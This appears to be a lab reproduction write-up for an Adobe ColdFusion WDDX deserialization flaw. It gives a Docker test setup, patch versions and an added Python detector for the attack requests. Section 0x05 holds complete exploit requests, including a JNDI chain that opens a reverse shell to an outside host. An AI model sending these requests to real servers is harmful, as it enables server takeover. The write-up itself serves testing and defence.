0x01 Product Introduction
Adobe ColdFusion is a rapid application development platform from Adobe. The platform includes an integrated development environment and a scripting language.
0x02 Vulnerability Overview
Adobe ColdFusion contains a deserialization of untrusted data vulnerability. An attacker can execute code through it, which can crash the server or yield control of the server.
0x03 Affected Versions
ColdFusion 2018 <= Update 16
ColdFusion 2021 <= Update 6
ColdFusion 2023 GA Release (2023.0.0.330468)
0x04 Reproduction Environment
Build the ColdFusion 2023.0.0.330468 vulnerable environment with Docker.
Pull the image:
docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release
Start the environment:
docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release
PS: Confirm which host port was mapped to container port 8080 (docker run -P assigns one at random).
Verify that the environment is accessible.
0x05 Vulnerability Reproduction
exp
POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: id
argumentCollection=
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='xcom.sun.rowset.JdbcRowSetImplx'>
<var name='dataSourceName'>
<string>ldap://your-ip:1389/Basic/TomcatEcho</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>
PS: This reproduction requires the JNDI exploit tool (JNDIExploit-1.4-SNAPSHOT.jar).
TomcatEcho echo chain
Start a listener
Reverse shell
Exploit chain:
POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
argumentCollection=
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='xcom.sun.rowset.JdbcRowSetImplx'>
<var name='dataSourceName'>
<string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>
0x06 Remediation
Based on the affected versions above, affected users are advised to update to a fixed version as soon as possible:
ColdFusion 2018 Update 17
ColdFusion 2021 Update 7
ColdFusion 2023 Update 1
Please refer to the download link:
https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
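For environments that cannot patch immediately, the requests shown in 0x05 have a recognisable shape that can be flagged at a WAF or from full-body request captures: a WDDX packet posted as argumentCollection whose struct carries an explicit Java type and whose string values hold a JNDI URI. The detector below is an added example written for this write-up, not code from the original post or from Adobe; the TAB-separated log format, the 203.0.113.5 address and the sample lines are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed sample: one request per line, TAB-separated as
#   <method>\t<path>\t<raw body>
# (assumed format; ordinary access logs lack the body, so feed this from a WAF or capture)
SAMPLE_LOG = """\
POST\t/CFIDE/adminapi/base.cfc?method\targumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://203.0.113.5:1389/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>
POST\t/CFIDE/adminapi/base.cfc?method\targumentCollection=<wddxPacket version='1.0'><header/><data><struct><var name='name'><string>alice</string></var></struct></data></wddxPacket>
GET\t/cfusion/index.cfm\t
"""

# type='...' on a WDDX <struct> is what turns a packet into a typed Java object
STRUCT_TYPE = re.compile(r"<struct[^>]*\btype=['\"]([^'\"]*)['\"]", re.I)
# JNDI lookup schemes that a dataSourceName-style property would resolve
JNDI_URI = re.compile(r"\b(ldap|ldaps|rmi|iiop|dns)://", re.I)
# substring match deliberately catches padded names such as xcom...Implx
DANGEROUS_TYPE = re.compile(r"JdbcRowSetImpl|com\.sun\.rowset|javax\.naming", re.I)


def classify(method: str, path: str, body: str) -> Optional[str]:
    """Return a finding label for one request, or None if nothing stands out."""
    body = unquote_plus(body)  # form-encoded bodies arrive percent-encoded
    if "<wddxPacket" not in body:
        return None
    types = STRUCT_TYPE.findall(body)
    if any(DANGEROUS_TYPE.search(t) for t in types):
        return "critical: WDDX struct names a JNDI-capable class"
    if JNDI_URI.search(body):
        return "high: WDDX packet carries a JNDI URI"
    if types and "/cfide/adminapi/" in path.lower():
        return "medium: typed WDDX struct posted to /CFIDE/adminapi/"
    return None


def scan(log: str) -> List[Tuple[int, str]]:
    """Run classify() over every log line; returns (line number, label) pairs."""
    findings = []
    for lineno, line in enumerate(log.splitlines(), 1):
        parts = line.split("\t", 2)
        if len(parts) < 3:
            continue  # malformed line, skip rather than guess
        label = classify(*parts)
        if label:
            findings.append((lineno, label))
    return findings


if __name__ == "__main__":
    for lineno, label in scan(SAMPLE_LOG):
        print(f"line {lineno}: {label}")
```

The second sample line is an untyped WDDX struct and produces no finding, so the check stays quiet for legitimate CFC argument passing.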